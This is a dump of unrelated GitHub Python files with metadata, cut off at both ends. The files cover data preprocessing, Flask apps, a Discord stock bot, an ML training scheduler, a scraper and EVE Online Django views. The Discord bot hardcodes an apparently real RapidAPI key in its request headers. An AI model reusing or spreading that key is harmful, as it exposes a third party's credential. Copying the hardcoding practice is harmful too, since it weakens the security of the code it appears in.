thread)\r\n","repo_name":"valdivieso01/itmanager","sub_path":"messenger/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15087903645","text":"\"\"\"\nDVC Stage interpolate-outliers - interpolates outliers\n\"\"\"\n\n# pylint: disable=E0401\n\nimport numpy as np\nimport pandas as pd\nimport settings.settings as settings\nimport data_preprocessing.columns_filter as col_filters\n\n\ndef __get_quantiles(df: pd.DataFrame, column: str, iqr_coef_lower=1.5\n , iqr_coef_upper=1.5):\n q1 = df[column].quantile(0.25)\n q3 = df[column].quantile(0.75)\n iqr = q3 - q1\n lower = q1 - iqr_coef_lower * iqr\n upper = q3 + iqr_coef_upper * iqr\n return lower, upper\n\n\ndef __get_outlier_indices(df: pd.DataFrame, column: str, lower: float,\n upper: float):\n upper_array = df[df[column] >= upper].index\n lower_array = df[df[column] <= lower].index\n return lower_array, upper_array\n\n\ndef interpolate_outliers_for_pollutant(df: pd.DataFrame, column: str,\n iqr_coef_lower=1.5,\n iqr_coef_upper=1.5\n ):\n \"\"\"\n Interpolates outliers in the dataframe for the required column\n @param iqr_coef_lower: Coefficient for lower iqr interval\n @param iqr_coef_upper: Coefficient for upper iqr interval\n @param df: Dataframe for interpolation outliers\n @param column: Column name\n \"\"\"\n lower, upper = __get_quantiles(df, column, iqr_coef_lower, iqr_coef_upper)\n lower_array, upper_array = __get_outlier_indices(df, column, lower, upper)\n df.loc[upper_array, column] = np.nan\n df.loc[lower_array, column] = np.nan\n print(f\"Outliers quantity: {df[column].isna().sum()}\")\n df[column] = df[column].interpolate(method='time')\n df[column].fillna(0, inplace=True)\n print(f'DEBUG fillna, column: {column}, sum_na {df[column].isna().sum()}')\n\n\ndef interpolate_outliers(pollutants_codes: [int],\n df_list: list[pd.DataFrame],\n iqr_borders: dict):\n \"\"\"\n Interpolates outliers in target AQI columns.\n @param pollutants_codes: The list of pollutant codes\n @param df_list: List of dataframes per pollutant\n @param iqr_borders: Dictionary per pollutant with 2-value arrays for IQR coefficients\n \"\"\"\n for i in range(len(pollutants_codes)):\n pollutant_id = pollutants_codes[i]\n for pred_value_type in settings.PREDICTION_VALUE_TYPES:\n # column_name = col_filters.get_target_column(\n # pred_value_type, pollutant_id)\n iqrs = iqr_borders[pollutant_id]\n interpolate_outliers_for_pollutant(df_list[i],\n pred_value_type,\n iqrs[0], iqrs[1])\n","repo_name":"AlexandraNasonova/air_pollution_predict","sub_path":"airpollpredictor/data_preprocessing/outliers_interpolator.py","file_name":"outliers_interpolator.py","file_ext":"py","file_size_in_byte":2670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71718199093","text":"# -*- encoding: utf-8 -*-\n\"\"\"\n2520 is the smallest number that can be divided by each of the numbers\nfrom 1 to 10 without any remainder.\n\nWhat is the smallest positive number that is evenly divisible\nby all of the numbers from 1 to 20?\n\"\"\"\nnumber = 0\n\nwhile True:\n number += 19\n for divider in range(1, 21):\n if number % divider != 0:\n break\n else:\n break\n\n\nprint(number)\n","repo_name":"citizen-stig/euler","sub_path":"p5s1.py","file_name":"p5s1.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11372475826","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nfrom flask import Flask, render_template, redirect, url_for, session, flash, request\n\nfrom models import db, User, TestOneResult, TestOne, db_init\nfrom config import SECRET_KEY, SQLITE_DATABASE_NAME\n\napp = Flask(__name__, static_url_path='', static_folder='static', template_folder='templates')\n\n\n# SQLAlchimy config\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + SQLITE_DATABASE_NAME\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True\napp.config['SECRET_KEY'] = SECRET_KEY\napp.config['SESSION_COOKIE_NAME'] = \"se_session\"\n\n\n# Init Database\ndb.app = app\ndb.init_app(app)\n\n\n@app.before_request\ndef make_session_permanent():\n session.permanent = True\n\n\n@app.route(\"/\")\ndef index():\n\n if \"username\" not in session:\n username = os.urandom(16).hex()\n\n # Create new user\n u = User(name=username)\n\n try:\n db.session.add(u)\n db.session.commit()\n session[\"username\"] = username\n except:\n print(\"Error while add user to the database\")\n print(u)\n\n return render_template(\"index.html\")\n\n username = session[\"username\"]\n user = User.query.filter_by(name=username).first()\n\n if not user:\n u = User(name=username)\n\n try:\n db.session.add(u)\n db.session.commit()\n session[\"username\"] = username\n except:\n print(\"Error while add user to the database\")\n print(u)\n return render_template(\"error.html\", msg=\"User not found\")\n\n user = User.query.filter_by(name=username).first()\n\n # Do we have answers?\n last_question_id = TestOneResult.query.filter_by(author_id=user.id).count()\n\n return render_template(\"index.html\", last_question_id=last_question_id)\n\n\n@app.route('/index.html')\ndef index_html():\n return redirect(url_for('index'))\n\n\n@app.route('/calculate_result.html')\ndef calculate_result():\n\n if \"username\" not in session:\n return redirect(url_for('index'))\n\n username = session[\"username\"]\n user = User.query.filter_by(name=username).first()\n\n if not user:\n return redirect(url_for('index'))\n\n answers = TestOneResult.query.filter_by(author_id=user.id)\n\n a_count = answers.count()\n\n if a_count < 74:\n flash(\"Вы ответили не на все вопросы\", category='error')\n return redirect(url_for('index'))\n\n groups_count_no = []\n groups_count_yes = []\n res = 0\n res_file = 0\n\n for x in [0, 1, 2, 3]:\n group_no = db.session.query(TestOneResult).join(TestOne).filter(TestOne.type == x)\\\n .filter(TestOneResult.author_id == user.id).filter(TestOneResult.answer < 4)\n\n group_yes = db.session.query(TestOneResult).join(TestOne).filter(TestOne.type == x)\\\n .filter(TestOneResult.author_id == user.id).filter(TestOneResult.answer > 4)\n\n groups_count_no.append(group_no.count())\n groups_count_yes.append(group_yes.count())\n\n if group_no.count() > res:\n res_file = x + 1\n res = group_no.count()\n\n res_file = \"result\" + str(res_file) + \".html\"\n\n #return render_template('result.html', groups_count_no=groups_count_no, groups_count_yes=groups_count_yes)\n return render_template(res_file)\n\n\n@app.route('/question.html', methods=['GET', 'POST'])\ndef get_question():\n\n if \"username\" not in session:\n return redirect(url_for('index'))\n\n username = session[\"username\"]\n user = User.query.filter_by(name=username).first()\n\n if not user:\n return redirect(url_for('index'))\n\n if request.method == \"POST\":\n question_id = request.args.get('question', default=0, type=int)\n answer = request.form.get('q_answer', type=int, default=0)\n\n if (not question_id) or (question_id > 74) or (question_id < 0):\n flash(\"Не указан номер вопроса\", category='error')\n return redirect(url_for('index'))\n\n if (answer <= 0) or (answer > 7):\n flash(\"Указанный ответ неверный\", category='error')\n return redirect(request.url)\n\n # Check if question_id in database\n q = TestOne.query.get(question_id)\n\n if not q:\n flash(\"Такого вопроса нет в базе\", category='error')\n return redirect(url_for('index'))\n\n res = TestOneResult(author_id=user.id, test_one_id=question_id, answer=answer)\n db.session.add(res)\n db.session.commit()\n\n next_q = q.id + 1\n return redirect(url_for(\"get_question\", question=next_q))\n\n # If it's GET\n question_id = request.args.get('question', default=0, type=int)\n\n if question_id:\n\n if question_id > 74:\n return redirect(url_for('calculate_result'))\n\n question = TestOne.query.get(question_id)\n\n if not question:\n flash(\"Такого вопроса нет\", category='error')\n return redirect(url_for('index'))\n\n return render_template(\"question.html\", user=user, question=question)\n\n # Well, no question_id\n # Try to get last user question.\n\n last_question = TestOneResult.query.filter_by(author_id=user.id).order_by(TestOneResult.id.desc()).first()\n\n # First time, get the first question and go\n if not last_question:\n first_question = TestOne.query.get(1)\n\n if not first_question:\n print(\"Database nas no questions\")\n return redirect(url_for('index'))\n\n return render_template(\"question.html\", user=user, question=first_question)\n\n if last_question.test_one_id >= 74:\n return redirect(url_for('calculate_result'))\n\n current_question = TestOne.query.get(last_question.test_one_id+1)\n return render_template(\"question.html\", user=user, question=current_question)\n\n\n@app.route('/result3.html')\ndef result_1():\n return render_template(\"result3.html\")\n\n\nif __name__ == \"__main__\":\n\n if len(sys.argv) > 1:\n if sys.argv[1] == \"init\":\n db_init()\n\n app.run(port=5000)\n","repo_name":"i1ya/FinBehaivor","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6067,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"27440386517","text":"from configs import *\nfrom packages import * \n\nimport data \nfrom train import train \nfrom copy import deepcopy \n\nparser = argparse.ArgumentParser(description='train file')\nparser.add_argument('--preprocess', type=bool, default=False, help='process training data using specified directory')\nparser.add_argument('--max_lr', type=float, default=1e-2, help='initial learning rate, decay to end_learning_rate with cosine annihilation')\nparser.add_argument('--min_lr', type=float, default=1e-3, help='ending learning rate')\nparser.add_argument('--max_epoch', type=int, default=50, help='maximum epoch for training')\nparser.add_argument('--epoch_samples', type=int, default=5_000, help='samples for each epochs')\nparser.add_argument('--epoch_updates', type=int, default=100, help='allowed updates for each epochs')\nparser.add_argument('--batch_size', type=int, default=1, help='batch size when training')\nparser.add_argument('--fine_tune_last', type=bool, default=False, help='fine tune last model?')\nparser.add_argument('--model_pickle_path', type=str, default='', help='pickled model path, use with scheduler')\nparser.add_argument('--log_path', type=str, default='/home/michael/ssd_cache/SMART/train_logs', help='train logs location')\nparser.add_argument('--task_type', type=str, default='Segmentation', help='Task type in train_log_path folder')\nparser.add_argument('--GPU', type=str, default='0', help='specify which GPU to train on')\nparser.add_argument('--debug', type=bool, default=False, help='set to debug mode')\noptions = parser.parse_args()\n\n\ndef dump_pickle(model, path):\n with open(path, 'wb') as fileout:\n pickle.dump(model, fileout)\n return None \n\n\ndef main():\n\n if 'win' in sys.platform.lower():\n options.log_path = 'Z:/Data/Malware/train_logs'\n else:\n options.log_path = '/home/michael/FreeNAS_Storage/Data/Malware/train_logs'\n \n if options.debug: \n torch.autograd.set_detect_anomaly(True)\n options.max_epoch = 2\n options.epoch_samples = 10\n options.epoch_updates = 10\n options.batch_size = 1\n else:\n warnings.filterwarnings(\"ignore\")\n \n if len(options.GPU) > 1:\n world_size = len(options.GPU.split(','))\n options.DDP = True \n else:\n options.DDP = False\n\n from models.candidate import dual_task, single_task\n to_train = [dual_task]\n \n line_gap = '-' * line_width\n for index, model_class in enumerate(to_train, 1):\n \n option_used = deepcopy(options) \n option_used.schedule = f'[{index}/{len(to_train)}]'\n model = model_class(options=option_used, input_shape=(patch_size, patch_size))\n path = f'Z:/home/michael/SSD_Cache/Malware/schedule/{model.__class__.__name__}.pickle'\n dump_pickle(model, path)\n option_used.model_pickle_path = path \n \n line = f' scheduler on {option_used.schedule} {model.__class__.__name__} '\n print(f'\\n{line_gap}\\n{line:-^{line_width}}\\n{line_gap}\\n')\n \n if option_used.DDP:\n torch.multiprocessing.spawn(train, nprocs=world_size, args=(world_size, option_used))\n else:\n train(option_used.GPU, 0, option_used)\n\n\nif __name__ == '__main__':\n \n if options.preprocess:\n data.make_model_data_on_stack() \n\n main()","repo_name":"Michael-H777/Malware_Classification","sub_path":"scheduler.py","file_name":"scheduler.py","file_ext":"py","file_size_in_byte":3304,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"28779616375","text":"class TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution:\n def lowestCommonAncestor(self, root: 'TreeNode', p: 'TreeNode', q: 'TreeNode') -> 'TreeNode':\n def getParents(tree, node):\n if not tree:\n return []\n if tree == node:\n return [tree]\n if node.val > tree.val:\n return [tree] + getParents(tree.right, node)\n return [tree] + getParents(tree.left, node)\n\n part1 = getParents(root, p)\n part2 = getParents(root, q)\n i = 0\n for i in range(min(len(part1), len(part2))):\n if part1[i] != part2[i]:\n return part2[i - 1]\n return part2[i]\n","repo_name":"MinnanZhou/Leetcode","sub_path":"235.py","file_name":"235.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73411470133","text":"# bot.py\nimport os\nimport pymongo\nimport requests\nimport json\nimport discord\nfrom dotenv import load_dotenv\nintents = discord.Intents.default()\nintents.members = True\nintents.messages = True\n\nload_dotenv() \nclient = discord.Client(intents=intents)\n\nTOKEN = os.getenv('DISCORD_TOKEN')\nGUILD = os.getenv('SERVER')\ndb_url = os.getenv('DB_URL')\nmongoClient = pymongo.MongoClient(db_url)\n\ndef get_new_member(member):\n return {\"_id\" : member.id,\n \"name\" : member.name,\n \"stocks\" : []}\n\ndef get_stock_info(url, headers, querystring):\n try:\n response = requests.get(url, headers=headers, params=querystring)\n return response.json()\n except Exception:\n return None\n\ndef getQuotes(code, time):\n url = \"https://twelve-data1.p.rapidapi.com/quote\"\n timeFrame = time\n querystring = {\"symbol\":code, \"interval\":\"1\" + timeFrame, \"format\":\"json\", \"outputsize\":\"1\"}\n headers = {\n 'x-rapidapi-key': \"76ddaf3224mshda367e947dd4415p1c17f7jsn86cb83e7e8cb\",\n 'x-rapidapi-host': \"twelve-data1.p.rapidapi.com\"\n }\n return get_stock_info(url, headers, querystring)\n \ndef getPrice(code):\n url = \"https://twelve-data1.p.rapidapi.com/price\"\n querystring = {\"symbol\":code, \"outputsize\":\"1\", \"format\":\"json\"}\n headers = {\n 'x-rapidapi-key': \"76ddaf3224mshda367e947dd4415p1c17f7jsn86cb83e7e8cb\",\n 'x-rapidapi-host': \"twelve-data1.p.rapidapi.com\"\n }\n return get_stock_info(url, headers, querystring)\n\n@client.event\nasync def on_member_join(member):\n new_member = get_new_member(member)\n mongoClient.DiscordBotDB.Members.insert_one(new_member)\n try:\n await member.send('Welcome to the Berver ' + member.name)\n except Exception:\n pass\n\n@client.event\nasync def on_member_remove(member):\n mongoClient.DiscordBotDB.Members.delete_one({\"_id\": member.id})\n try:\n await member.send('Sad to see you leave. We hope to see you again: ' + member.name)\n except Exception:\n pass\n\n@client.event\nasync def on_ready():\n for guild in client.guilds:\n if guild.name == GUILD:\n break\n\n print(\n f'{client.user} is connected to the following guild:\\n'\n f'{guild.name}(id: {guild.id})'\n )\n \n members = '\\n - '.join([member.name for member in guild.members if not member.bot])\n print(f'Guild Members:\\n - {members}')\n\n for member in guild.members:\n if not (mongoClient.DiscordBotDB.Members.find_one({\"_id\": member.id}) or member.bot):\n new_member = get_new_member(member)\n mongoClient.DiscordBotDB.Members.insert_one(new_member)\n\n@client.event\nasync def on_message(message):\n if message.author == client.user:\n return\n if message.content.startswith('$stock'):\n req = message.content.split()\n if (len(req) < 2):\n await message.channel.send('all requests must have at least one parameter')\n return\n infoType = req[1]\n stock = req[2].upper()\n\n if (infoType == 'price'):\n price = getPrice(stock)\n if (price == None):\n await message.channel.send(\"Could not get price for \" + stock)\n else:\n await message.channel.send(stock + \" current price : \" + price[\"price\"])\n\n elif (infoType == 'data'):\n if (len(req) != 4):\n await message.channel.send(\"Stock data requests must contain a third: timeframe parameter\")\n return\n time = req[3].lower()\n if (time == \"day\" or time == \"month\" or time == \"week\"):\n quote = getQuotes(stock, time)\n if (quote == None):\n await message.channel.send(\"Could not get data for \" + stock)\n else:\n await message.channel.send(\"Stock: \" + quote[\"name\"] + \" (\" + stock + \") \" + \"\\n\"\n \"High: \" + quote[\"high\"] + \"\\n\" +\n \"Low: \" + quote[\"low\"] + \"\\n\" + \n \"Volume: \" + quote[\"volume\"])\n return\n await message.channel.send(\"timeframe parameter must be: date, week, month or year\")\n\n elif (infoType == 'info'):\n quote = getQuotes(stock,'day')\n if (quote == None):\n await message.channel.send(\"Could not get info for \" + stock)\n else:\n await message.channel.send(\"Company: \" + quote[\"name\"] + \"\\n\" + \n \"Exchange: \" + quote[\"exchange\"] + \"\\n\" + \n \"Currency traded in: \" + quote[\"currency\"])\n elif (infoType == 'add'):\n stock_list = mongoClient.DiscordBotDB.Members.find_one({\"_id\": message.author.id})[\"stocks\"]\n if stock in stock_list:\n await message.channel.send(\"You already have \" + stock + \" in you list of saved stocks\")\n return\n price = getPrice(stock)\n if (price == None):\n await message.channel.send(\"Could not add stock \" + stock)\n else:\n stock_list.append(stock)\n print(stock_list)\n mongoClient.DiscordBotDB.Members.find_one_and_update({\"_id\": message.author.id}, {'$set': {'stocks': stock_list}})\n\n elif (infoType == 'remove'):\n stock_list = mongoClient.DiscordBotDB.Members.find_one({\"_id\": message.author.id})[\"stocks\"]\n if not (stock in stock_list):\n await message.channel.send(stock + \" is not in you saved list of stocks\")\n else:\n stock_list.remove(stock)\n print(stock_list)\n mongoClient.DiscordBotDB.Members.find_one_and_update({\"_id\": message.author.id}, {'$set': {'stocks': stock_list}})\n \n elif (infoType == 'my_stocks'):\n stock_list = mongoClient.DiscordBotDB.Members.find_one({\"_id\": message.author.id})[\"stocks\"]\n print(stock_list)\n if not (stock in stock_list):\n await message.channel.send(stock + \" is not in you saved list of stocks\")\n else:\n stock_list.remove(stock)\n print(stock_list)\n mongoClient.DiscordBotDB.Members.find_one_and_update({\"_id\": message.author.id}, {'$set': {'stocks': stock_list}})\n\n else:\n await message.channel.send(infoType + 'is not a valid command')\n\nclient.run(TOKEN)","repo_name":"lawrencecai49/DiscordStockBot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":6496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4963378491","text":"from __future__ import division, print_function\r\nimport os\r\nimport numpy as np\r\nfrom tensorflow.keras.models import load_model\r\nfrom tensorflow.keras.preprocessing import image\r\nfrom flask import Flask, request, render_template\r\nfrom werkzeug.utils import secure_filename\r\n\r\n# define flask app\r\napp = Flask(__name__)\r\n\r\n# model name\r\nMODEL_PATH ='resnet152V2_model.h5'\r\n\r\n# load trained model\r\nmodel = load_model(MODEL_PATH)\r\n\r\ndef model_predict(img_path, model):\r\n print('Uploaded image path: ',img_path)\r\n loaded_image = image.load_img(img_path, target_size=(224, 224))\r\n\r\n # preprocess the image\r\n loaded_image_in_array = image.img_to_array(loaded_image)\r\n\r\n # normalize\r\n loaded_image_in_array=loaded_image_in_array/255\r\n\r\n # add additional dim such as to match input dim of the model architecture\r\n x = np.expand_dims(loaded_image_in_array, axis=0)\r\n\r\n # prediction\r\n prediction = model.predict(x)\r\n\r\n results=np.argmax(prediction, axis=1)\r\n\r\n if results==0:\r\n results=\"The leaf is diseased cotton leaf\"\r\n elif results==1:\r\n results=\"The leaf is diseased cotton plant\"\r\n elif results==2:\r\n results=\"The leaf is fresh cotton leaf\"\r\n else:\r\n results=\"The leaf is fresh cotton plant\"\r\n\r\n return results\r\n\r\n@app.route('/', methods=['GET'])\r\ndef index():\r\n return render_template('index.html')\r\n\r\n@app.route('/predict', methods=['GET', 'POST'])\r\ndef upload():\r\n if request.method == 'POST':\r\n # Get the file from post request\r\n f = request.files['file']\r\n\r\n # Save the file to ./uploads\r\n basepath = os.path.dirname(__file__)\r\n file_path = os.path.join(\r\n basepath, 'uploads', secure_filename(f.filename))\r\n f.save(file_path)\r\n\r\n # Make prediction\r\n preds = model_predict(file_path, model)\r\n result=preds\r\n return result\r\n return None\r\n\r\nif __name__ == '__main__':\r\n app.run(port=5001,debug=True)\r\n","repo_name":"Akshaykumarcp/cotton-plant-disease-prediction","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"187939848","text":"import numpy as np\r\nimport scipy as sp\r\nimport scipy.signal\r\n\r\nfrom _lib.analyzer import BaseAnalyzer, group, field\r\n\r\n\r\nclass Analyzer (BaseAnalyzer):\r\n # automatically define the default group (empty string group) at first\r\n\r\n # the sample rate of input signals\r\n sample_rate = field.float_('Sample rate')\r\n # the number of channels\r\n channels = field.int_('Channels')\r\n # the length of input signals\r\n window_size = field.int_('Window size')\r\n # the length of the interval between signal clippings\r\n frame_step = field.int_('Frame step')\r\n\r\n # define group (in the global scope)\r\n group('Scaling')\r\n # the scale of a spectrum\r\n scale = field.float_(default=1.0, step=1.0)\r\n # whether to scale a spectrum or not\r\n use_scale = field.bool_(default=False)\r\n # * When the client-side name is not specified,\r\n # the attribute name will be used instead.\r\n\r\n # define another group (in the global scope)\r\n group('Window')\r\n # the name of a window function\r\n window_name = field.str_('Window', default='hann')\r\n\r\n # define the validation of the property (window names in scipy)\r\n @window_name.validate\r\n def validate_window_name(self, value: str):\r\n return value in [\r\n 'boxcar',\r\n 'triang',\r\n 'blackman',\r\n 'hamming',\r\n 'hann',\r\n 'bartlett',\r\n 'flattop',\r\n 'parzen',\r\n 'bohman',\r\n 'blackmanharris',\r\n 'nuttall',\r\n 'barthann',\r\n ]\r\n\r\n # define the callback of the properties\r\n @window_size.compute\r\n @window_name.compute\r\n def update_window(self):\r\n self.window = sp.signal.get_window(\r\n self.window_name,\r\n self.window_size,\r\n )\r\n self.window_sum = self.window.sum() ** 2.0\r\n\r\n def __init__(self):\r\n # require to call the callbacks above in the initializer\r\n # (not called automatically)\r\n self.update_window()\r\n\r\n def analyze(self, signal: np.ndarray):\r\n # from (frames, channels) to (channels, frames)\r\n signal = signal.T\r\n # multiply the window\r\n signal *= self.window\r\n # calculate the one side of the power spectrum\r\n spectrum = np.abs(np.fft.rfft(signal, axis=1)) ** 2\r\n\r\n if self.use_scale:\r\n spectrum *= self.scale\r\n\r\n # send the result to the client side\r\n return {\r\n # 1D numpy array can be sent directly\r\n 'window': self.window,\r\n # Multi-dimensional numpy array must be converted\r\n # into the Python list of the 1D numpy arrays\r\n # because there is no multi-dimensional JavaScript TypedArray.\r\n 'spectrum': list(spectrum),\r\n }\r\n","repo_name":"accup/VyJit","sub_path":"analyzers/stft/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"44802878355","text":"import pandas as pd\nimport numpy as np\nimport wikipedia as wiki\nfrom bs4 import BeautifulSoup\nfrom progress.bar import IncrementalBar\n\nplayers = pd.read_csv(\"data/final_19.csv\", sep=\";\")[\"Nome\"].unique()\n\n\ndef main():\n age = []\n i = 0\n for player in IncrementalBar(\"Drafting\").iter(players):\n try:\n html = wiki.page(player).html()\n soup = BeautifulSoup(html, \"html5lib\")\n except:\n try:\n html = wiki.page(player + \" (football)\").html()\n soup = BeautifulSoup(html, \"html.parser\")\n except:\n age.append(np.nan)\n continue\n try:\n age_info = (\n soup.find(\"span\", attrs={\"class\": \"ForceAgeToShow\"})\n .text.replace(\" (age\\xa0\", \"\")\n .replace(\")\", \"\")\n )\n except:\n age_info = np.nan\n age.append(age_info)\n df = pd.DataFrame()\n df.loc[:, \"Player\"] = players\n df.loc[:, \"age\"] = age\n df.to_csv(\"age_wiki.csv\", sep=\",\", index=False)\n print(df)\n\n\nmain()\n","repo_name":"FDRienzo/FantacalcioAnalisi","sub_path":"find_age.py","file_name":"find_age.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34845907923","text":"from datetime import datetime, timedelta\n\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth.decorators import login_required, permission_required\nfrom typing import Iterable\nfrom django.contrib import messages\nfrom django.utils.translation import gettext as gt\nfrom django.conf import settings\n\nfrom esi.decorators import token_required\nfrom allianceauth.eveonline.models import EveCharacter\nfrom allianceauth.services.hooks import get_extension_logger\n\nfrom .tasks import process_scan, import_extraction_data\nfrom .models import Resource, TrackingCharacter, Extraction, EveMoon\nfrom .providers import ESI_CHARACTER_SCOPES\n\nlogger = get_extension_logger(__name__)\n\n# Get refine setting\nrefine = .876\nif hasattr(settings, 'MOON_REFINE_PERCENT'):\n if settings.MOON_REFINE_PERCENT > 1:\n refine = settings.MOON_REFINE_PERCENT / 100\n else:\n refine = settings.MOON_REFINE_PERCENT\n\n# Get Default Extraction View setting\nextraction_view = \"Calendar\"\nif hasattr(settings, \"DEFAULT_EXTRACTION_VIEW\"):\n extraction_view = settings.DEFAULT_EXTRACTION_VIEW\n\n\ndef _get_resource_values(resources: Iterable[Resource]) -> dict:\n \"\"\"\n Returns a dict containing the per-m3 values for a given list of resources.\n :param resources:\n :return:\n \"\"\"\n ret = dict()\n\n for resource in resources:\n value = 0\n mats = resource.ore.materials.all()\n for mat in mats:\n ore_volume = resource.ore.volume\n amount = mat.quantity\n mat_value = mat.material_eve_type.market_price.average_price\n value += (((amount / 100) * refine) * mat_value) / ore_volume\n ret[resource.ore.id] = value\n\n return ret\n\n\ndef _get_moon_value_dict(moon_id: int) -> dict:\n \"\"\"\n Returns a dict containing the per-m3 values of the moon's resources\n :param moon_id: The id of the moon.\n :return:\n \"\"\"\n resources = Resource.objects\\\n .prefetch_related('ore', 'ore__materials', 'ore__materials__material_eve_type__market_price')\\\n .filter(moon__id=moon_id)\n\n ret = _get_resource_values(resources)\n\n return ret\n\n\ndef _get_extractions(limit=None):\n \"\"\"\n Gets a dict of extractions from beginning of the current.\n :param limit: Number of days out to go. (Default: None - Will grab ALL extractions)\n :return:\n \"\"\"\n if limit:\n qs = Extraction.objects.select_related('moon')\\\n .filter(arrival_time__gte=datetime.utcnow().replace(day=1),\n arrival_time__lte=datetime.utcnow()+timedelta(days=limit),\n cancelled=False)\\\n .prefetch_related('moon__resources', 'moon__resources__ore', 'refinery')\\\n .order_by('arrival_time')\n else:\n qs = Extraction.objects.select_related('moon')\\\n .filter(arrival_time__gte=datetime.utcnow().replace(day=1),\n cancelled=False)\\\n .prefetch_related('moon__resources', 'moon__resources__ore', 'refinery')\\\n .order_by('arrival_time')\n\n return qs\n\n\ndef _build_event_dict(qs):\n ret = [\n {\"title\": q.refinery.name,\n \"start\": datetime.strftime(q.arrival_time, '%Y-%m-%dT%H:%M:%S%z'),\n \"moon\": q.moon.name,\n \"rarity\": [r.rarity for r in q.moon.resources.all()],\n \"moon_id\": q.moon.id}\n for q in qs\n ]\n\n return ret\n\n\n# Create your views here.\n@login_required\n@permission_required('moonstuff.access_moonstuff')\ndef dashboard(request):\n \"\"\"\n The main view for moonstuff.\n :param request: HTTPRequest object\n :return:\n \"\"\"\n ctx = dict()\n\n # Get upcoming extraction events (calendar)\n extractions = _get_extractions()\n events = _build_event_dict(extractions)\n\n # Get moons\n moons = EveMoon.objects.filter(resources__isnull=False).distinct()\\\n .prefetch_related('resources',\n 'resources__ore',\n 'resources__ore__materials',\n 'resources__ore__materials__material_eve_type__market_price',\n 'extractions',\n 'extractions__refinery',\n 'extractions__refinery__corp',\n 'eve_planet',\n 'eve_planet__eve_solar_system',\n 'eve_planet__eve_solar_system__eve_constellation__eve_region',\n )\n\n resources = tuple(set(res for moon in moons for res in moon.resources.all()))\n ctx['events'] = events\n ctx['extractions'] = extractions\n ctx['moons'] = moons\n ctx['resources'] = _get_resource_values(resources)\n ctx['default_view'] = extraction_view\n return render(request, 'moonstuff/dashboard.html', ctx)\n\n\n@login_required\n@permission_required('moonstuff.add_resource')\ndef add_scan(request):\n \"\"\"\n View for adding moon scan data.\n :param request: HTTPRequest object\n :return:\n \"\"\"\n if request.method == 'POST':\n scan_data = request.POST['scan']\n\n process_scan.delay(scan_data, request.user.id)\n messages.success(request, gt('Your moon scan is being processed. Depending on size this may take some time.'))\n return redirect('moonstuff:dashboard')\n\n return render(request, 'moonstuff/add_scan.html')\n\n\n@login_required\n@token_required(scopes=ESI_CHARACTER_SCOPES)\n@permission_required('moonstuff.add_trackingcharacter')\ndef add_character(request, token):\n \"\"\"\n View for adding tracking character and corresponding token.\n :param request: HTTPRequest object\n :param token: django-esi Token object\n :return:\n \"\"\"\n\n eve_char = EveCharacter.objects.get(character_id=token.character_id)\n if not TrackingCharacter.objects.filter(character=eve_char).exists():\n messages.success(request, gt('Character added!'))\n char = TrackingCharacter(character=eve_char)\n char.save()\n\n # Schedule an import task to pull data from the new Tracking Character.\n import_extraction_data.delay()\n else:\n messages.error(request, gt('That character is already being tracked!'))\n\n return redirect('moonstuff:dashboard')\n\n\n@login_required\n@permission_required('moonstuff.access_moonstuff')\ndef moon_info(request, moon_id=None):\n \"\"\"\n View for viewing a moon's data.\n :param request: HTTPRequest object\n :param moon_id: integer\n :return:\n \"\"\"\n ctx = {}\n if moon_id is None:\n messages.error(request, gt(\"Please provide the ID of a moon to view it's data.\"))\n return redirect('moonstuff:dashboard')\n\n # Get moon\n try:\n moon = EveMoon.objects.filter(id=moon_id, resources__isnull=False)\\\n .prefetch_related('extractions',\n 'extractions__refinery',\n 'resources',\n 'resources__ore',\n )[0]\n ctx['resources'] = _get_moon_value_dict(moon_id)\n ctx['moon'] = moon\n except EveMoon.DoesNotExist:\n messages.error(request, gt('A moon matching the provided ID could not be found.'))\n return redirect('moonstuff:dashboard')\n\n if request.is_ajax():\n return render(request, 'moonstuff/moon_info_ajax.html', ctx)\n return render(request, 'moonstuff/moon_info.html', ctx)\n","repo_name":"staropera/aa-moonstuff","sub_path":"moonstuff/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70613854132","text":"from attr import s\nimport numpy as np\nimport os\nimport rasterio\nimport gc\n\nfrom utils import reproj_match, write_image\n\nSSM_FLAGS = {\n \"nodata\": 255,\n \"max\": 242,\n \"min\": 241,\n \"water\": 251,\n \"sensitivity\": 252,\n \"slope\": 253\n}\n\ndef mask_ssm(array, flag_list):\n \n flag_mask = np.zeros_like(array)\n \n # then we will loop through the flags and add the \n for flag in flag_list:\n # get the mask for this flag\n flag_mask[array == SSM_FLAGS[flag]] = 1\n\n return flag_mask\n\ndef ssm2volumetric(ssm:str, mask:str, 